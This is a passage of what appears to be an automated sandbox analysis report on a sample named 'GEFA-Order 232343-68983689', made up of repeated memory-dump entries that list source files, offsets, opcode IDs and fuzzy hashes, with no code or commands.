                                          • Instruction Fuzzy Hash: 4EF05E30D05348EFC740DFA8D8445ADBBF5EB89300F14C1EAE86897241D7345A06CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f539290794f94a33e7d9d3be8e57753ff54deae178fb9412b46b74416c4538ae
                                          • Instruction ID: 6aa89ad8502aa8629a8550d2e72c24b6da766753e3cf2fc9f9381068288330f4
                                          • Opcode Fuzzy Hash: f539290794f94a33e7d9d3be8e57753ff54deae178fb9412b46b74416c4538ae
                                          • Instruction Fuzzy Hash: 9CF0E930D14308EFC780EF78C9556ACBFB9DB49200F2080AAD45DD7251E6329A45CB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35b0716a54ebe42839bd9ad82ad8a30e8aba6a405abe18115afc88d1af3d23e0
                                          • Instruction ID: 9730d093479321ae51b359f77a835646124049623c21f54c380958a98863085c
                                          • Opcode Fuzzy Hash: 35b0716a54ebe42839bd9ad82ad8a30e8aba6a405abe18115afc88d1af3d23e0
                                          • Instruction Fuzzy Hash: D0F05834D09289AFD741DBA5C8519F8BFB5EB4A350F20C0AAE85497242CA368A19DB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc147e4dfd1f0bb51abee7cc5a5ab0ff47c26560de36d9f1cf8bef097989092d
                                          • Instruction ID: 062a9c38be9599538c13c38ab45605485920de2a5e871919e0648b5de14c7611
                                          • Opcode Fuzzy Hash: cc147e4dfd1f0bb51abee7cc5a5ab0ff47c26560de36d9f1cf8bef097989092d
                                          • Instruction Fuzzy Hash: CE017838A0A218DFCB10DF28E88878DBBB1EF86311F1440A6E509AB350CB785D84CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a08cb571a045deee039b871ec586540c01e10bdec9bd7894d5727a2f11f34d1a
                                          • Instruction ID: 5aaee334b5c00811d604ae1c8173661e759d31a9afe3f5bb2e0658c7b23cc16a
                                          • Opcode Fuzzy Hash: a08cb571a045deee039b871ec586540c01e10bdec9bd7894d5727a2f11f34d1a
                                          • Instruction Fuzzy Hash: 94F06D29F28382DF9BD64AB99C5997777A85B450D030644A6E516CF142F620C440CBE1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fde074c82d5c24c71e81b384540c74ed07b8097dfafc43d5787ffd254948c35d
                                          • Instruction ID: efbf5f6aa3703dfa5dde61fd5b6f2d535d629d7c9fc563085a5912c90f130fb1
                                          • Opcode Fuzzy Hash: fde074c82d5c24c71e81b384540c74ed07b8097dfafc43d5787ffd254948c35d
                                          • Instruction Fuzzy Hash: F0F03A30D09348AFC781DFA8D8556A8BFB5EF49200F1480DAD85897242D6355A06CB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 866d244179ce75b549cd2e7c3151d8bc8a4e1e64efb7e425e7d8cd71c6933670
                                          • Instruction ID: 5521d53e9dbc61d16502d6618d41fa7790f07e684866a724ff5d4dfb21f505d6
                                          • Opcode Fuzzy Hash: 866d244179ce75b549cd2e7c3151d8bc8a4e1e64efb7e425e7d8cd71c6933670
                                          • Instruction Fuzzy Hash: BCF0E2B8C09248AFC345CFA4C8505ADFFB8AB49300F14C1DBE8448B341C6364E01CF92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6a92003f08b2f79fdeb19c140b2be0c2b94e11049d25801b49d62d7f94bc35a
                                          • Instruction ID: 86c923503c2bf8d36af5642b09503921df22885f4ab29ca4246c9cdfa76178e1
                                          • Opcode Fuzzy Hash: c6a92003f08b2f79fdeb19c140b2be0c2b94e11049d25801b49d62d7f94bc35a
                                          • Instruction Fuzzy Hash: DDE09230846308AFC742FFB8D8195DA7BF9DF86200F0185A7E44987151EA741E14ABA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79dbbd705d359790f346a61fb27381df5311d1fa56b909769d92d0f676486fea
                                          • Instruction ID: 3e3c7d5cc79036c0d5eaff601833d0875d00fe8171ceaf9f2d140ac7ffceca5d
                                          • Opcode Fuzzy Hash: 79dbbd705d359790f346a61fb27381df5311d1fa56b909769d92d0f676486fea
                                          • Instruction Fuzzy Hash: 9C01C874A05218CFEB54EF58E488B9977B2FB44341F1085A5D5099B340D7385E898F51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2205c3108ba8a60651c46dcf343891ea5a53a02de9989bb3a6d2e3029d384ca
                                          • Instruction ID: c6234c0f88af62a6500e33071f776917a628c4e87b692e3a243d32bf5fc81b5e
                                          • Opcode Fuzzy Hash: b2205c3108ba8a60651c46dcf343891ea5a53a02de9989bb3a6d2e3029d384ca
                                          • Instruction Fuzzy Hash: CEE0E5A560F3C02FCB83C271AD698963F358E1328570A42D7E084DF4E3D259690AC7B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f80e183f339ed818f7ea70d2e5427c4c9dfeb5548d829b5a5a2876b31059251b
                                          • Instruction ID: e7166479eb024d3613fff83397fc8829f5c8094540268e62919db6c3f0a9170a
                                          • Opcode Fuzzy Hash: f80e183f339ed818f7ea70d2e5427c4c9dfeb5548d829b5a5a2876b31059251b
                                          • Instruction Fuzzy Hash: 48E0ED70D09748AFC788EFB8980519C7FB0AB05300F1240AAC448DE241E6324A40CB83
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67c0068334d3a35d1477f036f600fb279a43b908d7e52e6320185967117f7b33
                                          • Instruction ID: 58d3f3d4d85ec459804b907985b7346c893a172a4c34cf17e14f617d4f90a394
                                          • Opcode Fuzzy Hash: 67c0068334d3a35d1477f036f600fb279a43b908d7e52e6320185967117f7b33
                                          • Instruction Fuzzy Hash: 5901BB74601255CFC794EF58E995BA977B1FB48340F5084D9D40AAB381DA345D89CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90b7d679b76158073d6fe8fba94914eaa4bd1f3c73eaf31cf78fb263278c4b14
                                          • Instruction ID: 82919b6bf57f10769c97a774404fa31b43afc2c034f79f56a1813d9bcc45e464
                                          • Opcode Fuzzy Hash: 90b7d679b76158073d6fe8fba94914eaa4bd1f3c73eaf31cf78fb263278c4b14
                                          • Instruction Fuzzy Hash: 03E0E530D09244AFD700EA7488119F87FB5DB46204F1080DAD84457341CA311E06CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76d3acd80a0488142dea188e3f48db8d70485f7c7d9dc2962cfd5d3031aef3b8
                                          • Instruction ID: 916d4667f11ccce1c7fe3e52a0b78962b1fa92d047a2199750a483309f4c3891
                                          • Opcode Fuzzy Hash: 76d3acd80a0488142dea188e3f48db8d70485f7c7d9dc2962cfd5d3031aef3b8
                                          • Instruction Fuzzy Hash: C7F0373094A385DFD781DF78D4459A8BFF49F06210F2444DEE884D7252D6309D48DB52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7009446e1f827348651a3bbbd129bb15893a503c70e8f6145e41d46d9de71a30
                                          • Instruction ID: 8bf5483aefcbde3b74f756bf7fcafcc1aaa0d58d50eab07e31688ab6f7f3eccf
                                          • Opcode Fuzzy Hash: 7009446e1f827348651a3bbbd129bb15893a503c70e8f6145e41d46d9de71a30
                                          • Instruction Fuzzy Hash: 3EF0A0B1C48348AFC785CFA8C4501A8BFB4EB4A200F14C1EBD8489F242D6325A02CB46
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1ffa3349e5bdb7f66e0ceef51e06793adc657f29fcb54b6a7d54fb319dffcd3
                                          • Instruction ID: 0cf65ae40cf069fbc92c492b594b89e4f083d9832610e962e82eda421e11a299
                                          • Opcode Fuzzy Hash: e1ffa3349e5bdb7f66e0ceef51e06793adc657f29fcb54b6a7d54fb319dffcd3
                                          • Instruction Fuzzy Hash: 5FE06D3084E208AFC704CB64E8515BDBF78EB8A300F10C1AAE8895B251E6315E56DBD6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b036f86b26df3dd7d130d1770d760cfd7d695f028fce051d42919b851f166d24
                                          • Instruction ID: 291bc3eb46d48959b8a100157e2d8e2757b3d2097fe4e7052e3443165460d714
                                          • Opcode Fuzzy Hash: b036f86b26df3dd7d130d1770d760cfd7d695f028fce051d42919b851f166d24
                                          • Instruction Fuzzy Hash: 59F09074A00115CBCB55EF58D4989DAB3B6FB99340F108096D919DB748DB384F82EFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 438af8efe53dc0c756b0bd6ae8d6384ad4b38a56f0a5f030cd878299a748bfda
                                          • Instruction ID: f1a69df4fcf3b81bcea6635e0fd7b2b5a3d587ab5b24d23b498a2ef9415ccbb1
                                          • Opcode Fuzzy Hash: 438af8efe53dc0c756b0bd6ae8d6384ad4b38a56f0a5f030cd878299a748bfda
                                          • Instruction Fuzzy Hash: D2F09035D09348FFCB41DFA4C8009ACBFB5EB48310F14C0AAB81456252DA326A51DF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e817cdd981c5857871cf17d1ee5e186b6aecc0e7bc2242da5b90de96a0938dd1
                                          • Instruction ID: ae2f4e61654ab777af2529df3142c75fca38b0ce982ac4f375e5c3ba08930394
                                          • Opcode Fuzzy Hash: e817cdd981c5857871cf17d1ee5e186b6aecc0e7bc2242da5b90de96a0938dd1
                                          • Instruction Fuzzy Hash: 77E065B4949208AFCB49CF64D801578BF74EF46304F11859DD84557292D7319A0BDB52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ed0b67f97deec54eb2de5bf6814de0748e223cbd628071daa86bb5544308365
                                          • Instruction ID: fb8052f18d8c5980fc0f0253f37e2c62f3fbe6f834f01a60dd15af8d1b52ebcc
                                          • Opcode Fuzzy Hash: 7ed0b67f97deec54eb2de5bf6814de0748e223cbd628071daa86bb5544308365
                                          • Instruction Fuzzy Hash: 33F0A074909348EFC780EF78C4449A9BFF4AF0A700F2044D9F888C7212D2308948CB61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05fce9f919fbfebfff3c0ed03ef8907017f1e79320aca767c4549b2115ec03cb
                                          • Instruction ID: 43feae81456dfa348ee2b7d749938987b927ee2ce9d63fcbe8921e91e39af68b
                                          • Opcode Fuzzy Hash: 05fce9f919fbfebfff3c0ed03ef8907017f1e79320aca767c4549b2115ec03cb
                                          • Instruction Fuzzy Hash: 26E02031A4D3509FDBD266705C01BE63B754F472A5F1500EFE514EF1D1C565C802C362
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b63b37450810a3c1fb5478d3c477e999507276a11169923dc6534f92bc06e312
                                          • Instruction ID: 068c27e47ffc96f1adb4336b71ef1a087539eed20e06ef56d44543fa6647833f
                                          • Opcode Fuzzy Hash: b63b37450810a3c1fb5478d3c477e999507276a11169923dc6534f92bc06e312
                                          • Instruction Fuzzy Hash: CAF0A770909384DFC791DF7D94555587FF49B0A210F1002EAD484DB697E3311544DB51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5213c38c13c33a61ad8acff5c51aef8acd33bce2d105e2d2f07f6d2c1402f57
                                          • Instruction ID: dd16de7d238a9b28944d8f21055b1cddf84769eeb7966a0fc00f1602e1c29bcf
                                          • Opcode Fuzzy Hash: a5213c38c13c33a61ad8acff5c51aef8acd33bce2d105e2d2f07f6d2c1402f57
                                          • Instruction Fuzzy Hash: 4BE06830049304AFC300DF61C8116A4BBB8DB43300B10C08D98484B242C5334E06CB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c30d9a05b86c008321b015199d4f7fdec10c9ff530baa62dc5e868a1fe71764c
                                          • Instruction ID: 65959be89205621d9f99ddcae64f8460224247e09ea02060f379c1f38bc6e82d
                                          • Opcode Fuzzy Hash: c30d9a05b86c008321b015199d4f7fdec10c9ff530baa62dc5e868a1fe71764c
                                          • Instruction Fuzzy Hash: 9AF03074D09208AFC745CFA8D9525ACBBB4EB89300F54C09AD85897381D6725E55DF82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 671b935cac1f2fa7467eea0709d7154299d1394b3495864a22a53cc661c70268
                                          • Instruction ID: f2e69ea1bb7712808d26ff464e75df2a0371cd6639e9313160e184f049b35ae0
                                          • Opcode Fuzzy Hash: 671b935cac1f2fa7467eea0709d7154299d1394b3495864a22a53cc661c70268
                                          • Instruction Fuzzy Hash: 08019274E102699FDBA4DF64DC54BDCBBB1BB49700F5045DADA0DA7250DA301E80CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70bf46de791aff539dc2c0699c84a3f0b3b268ad92a679b498f437f512ec4994
                                          • Instruction ID: 862525beb3dc60465bdaa16f245f5129c574889fe8a51d0f55c361ecda647fc9
                                          • Opcode Fuzzy Hash: 70bf46de791aff539dc2c0699c84a3f0b3b268ad92a679b498f437f512ec4994
                                          • Instruction Fuzzy Hash: 96016270901258CFEB90DF58D849BADBBB2BB05305F4481A5E049ABA55DB745E88CF21
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cee0936f6b90c96bbb4f0e2ecc28709451e829555ddffe0f0f835357b407de49
                                          • Instruction ID: eaac22e956653aa1a10590a02c5fcb3dacb3b803bb6f47d6d96799a0f06d9627
                                          • Opcode Fuzzy Hash: cee0936f6b90c96bbb4f0e2ecc28709451e829555ddffe0f0f835357b407de49
                                          • Instruction Fuzzy Hash: 74F0657090A384EFDB51EF7894455A8BFF4DB06201F5444DEE8C4D3242D6305A48CB52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a307f0c8edd4da44c15a4cb79cdf60bea14d7b8ef56fd9c87f1d5a6dd63a951
                                          • Instruction ID: 85647017ddc608bc023e13b4820643bd659ad551d33e95cf5ab11db5b813ce0c
                                          • Opcode Fuzzy Hash: 1a307f0c8edd4da44c15a4cb79cdf60bea14d7b8ef56fd9c87f1d5a6dd63a951
                                          • Instruction Fuzzy Hash: 3701CF70D01228DFEFA0CF24D895BDDBBB1BB4A310F1095A9C449B3240CB348AC48F61
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f97ebb99ad651e927c5becbc13c95bcb20b7590e9282f1de83f7c79d7ab6b52
                                          • Instruction ID: b0757ca939e8b237aed949aec38166c01cc066d69dd4281651dd1d8f15c7ae03
                                          • Opcode Fuzzy Hash: 1f97ebb99ad651e927c5becbc13c95bcb20b7590e9282f1de83f7c79d7ab6b52
                                          • Instruction Fuzzy Hash: EDF0F874D04248EFCB80DFA9C840ABDBBF8AB49310F14C49AA869D3241D6359A15EF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d034a0c389b6bafc46fb7460714c0d52abe5ba771f213414491b67acee655265
                                          • Instruction ID: bf40408533cc8e508df0aeb1274c93f40c279fea5bb9832b14bdbcdc0767bad9
                                          • Opcode Fuzzy Hash: d034a0c389b6bafc46fb7460714c0d52abe5ba771f213414491b67acee655265
                                          • Instruction Fuzzy Hash: 44E0ED74808204EFCB05CBA0D9454BCBFB1EB46321F1481CBD806AB313C2314A56EB62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e29ca70bf79eb9e34b863a9b02dfae56e200c8bd3023ddbe5876fa693fa9565
                                          • Instruction ID: 404a088c01dde59327c8a57700c9c7a2ca1a51332e12d408cce00a890fbf3680
                                          • Opcode Fuzzy Hash: 4e29ca70bf79eb9e34b863a9b02dfae56e200c8bd3023ddbe5876fa693fa9565
                                          • Instruction Fuzzy Hash: F1E06D70905389AFCB42EF68D854689BBB6EF86201B0546DAE409DB202E5751F048792
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a72376f4c707e8a62eb5ba0aeb78ae3c988eef02d54f41f4033d1938c581da83
                                          • Instruction ID: d224711adf58e736866df3e5d75cfa1989fc014965308414c859c93b74f055a4
                                          • Opcode Fuzzy Hash: a72376f4c707e8a62eb5ba0aeb78ae3c988eef02d54f41f4033d1938c581da83
                                          • Instruction Fuzzy Hash: 89E09271846254AFCB02EBB488159DB7BB88B05300F1244E69909A7691E9318A0597D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736084354.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f40000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff5f75ea0c4d5875abf16228d35353c9ab271bbaa04c227367e61b5727d8780a
                                          • Instruction ID: 986ecdc1788151240f53729c1c9e428613c893cc4a0c39ea0c0fde2a9904d559
                                          • Opcode Fuzzy Hash: ff5f75ea0c4d5875abf16228d35353c9ab271bbaa04c227367e61b5727d8780a
                                          • Instruction Fuzzy Hash: 8BF0DA35D04208EFCB45DF94D9409ADBBB6EF48320F10C599F86456391D6319A51EF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 123e122a1eba5a1c57b59449574a5efd764b33e68c62bdca4c7e8aca4a667d91
                                          • Instruction ID: 2b2f856e56cc973c31406e58dedd04a5a481d775165215a3ecd1a5c3edf2bbfe
                                          • Opcode Fuzzy Hash: 123e122a1eba5a1c57b59449574a5efd764b33e68c62bdca4c7e8aca4a667d91
                                          • Instruction Fuzzy Hash: BDE0923894A208EFDB01DFA4E80696CBFB5EB85300F50C0EAEC5417351D6729E69DB96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8b7ba34a8f2c421c4a6ecb9d45711e07a4cfb4ff3db3ea796cb60e80fcd847af
                                          • Instruction ID: 38f4f76fe692661655781156b3e1efec548ef13586087029cad58e26eec1cb34
                                          • Opcode Fuzzy Hash: 8b7ba34a8f2c421c4a6ecb9d45711e07a4cfb4ff3db3ea796cb60e80fcd847af
                                          • Instruction Fuzzy Hash: 06F06535E04318EFCB09CF99D4487DDBFB7DB44261F148095E00997254EB705A81CB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73b03354541da739f943861cb9cacb78f80f259e876bb15250cb77a927d8f98d
                                          • Instruction ID: 21e9f9334d4e57bf9d6ea346912fb73d6ceddc6baaa30af7678757dc2783377b
                                          • Opcode Fuzzy Hash: 73b03354541da739f943861cb9cacb78f80f259e876bb15250cb77a927d8f98d
                                          • Instruction Fuzzy Hash: 4CF0E734A00218DFDB90DF58E48879D77B2FB8D351F104499D549AB381CB389D85CF52
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8aabf91bd161409624584b63eea128da6d89599f3190644aeda88c73a310657
                                          • Instruction ID: 7d7a3def5d068ee33f0cb08f5a92e480b6e46c6c46b1cc44e388fe42b462e7a3
                                          • Opcode Fuzzy Hash: b8aabf91bd161409624584b63eea128da6d89599f3190644aeda88c73a310657
